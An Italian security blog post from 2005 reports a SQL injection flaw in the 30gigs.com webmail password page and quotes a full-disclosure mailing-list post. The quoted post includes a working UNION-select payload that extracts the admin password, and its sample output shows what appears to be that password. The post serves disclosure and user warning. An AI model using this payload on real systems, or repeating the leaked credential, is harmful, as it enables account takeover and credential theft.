ush.it - a beautiful place

Password discovery su 30gigs.com

November 16, 2005 at 2:40 pm - Filed under Insecurity, Language EN - 246 words, reading time ~0 minutes - Permalink - Comments

E' stata trovata da cumhur onat una sql injection che permette di trovare la password di un utente arbitrario tramite la pagina di login del servizio mail 30gigs.com.

Se avete account su 30gigs.com conviene cambiare password di frequente in questi giorni, fino a quando il problema sara' fixato.

Cos'e' 30gigs.com? trovate una recensione qui (su downloadblog.it)

http://www.downloadblog.it/post/509/30gigscom-webmail-gratis-da-30-gigabyte

Mail delle 14.16 giuta su fd (full-disclosure@lists.grok.org.uk)


cumhur onat wrote:
> I found a sql injection vulnerability, which leads to password
> disclosure in 30gigs.com email service.
> The vulnerability exists in http://www.30gigs.com/getpassword/ page due
> to lack of validation of user submitted data.
> Proof of Concept:
> enter http://www.30gigs.com/getpassword/
> and copy & paster this code in the Login field, finally submit the form.
>
> not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin
>
> it will give an output like below, in which "runsit" corresponds to the
> password of account "admin"
> We have sent the password for your not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin@30gigs.com account to runsit
>
> The site has been notified about the vulnerability 2 weeks ago, but no
> response was taken.

Reed's Alert! Got something burning? Tell USH team.
THP USH Wisec DigitalBullets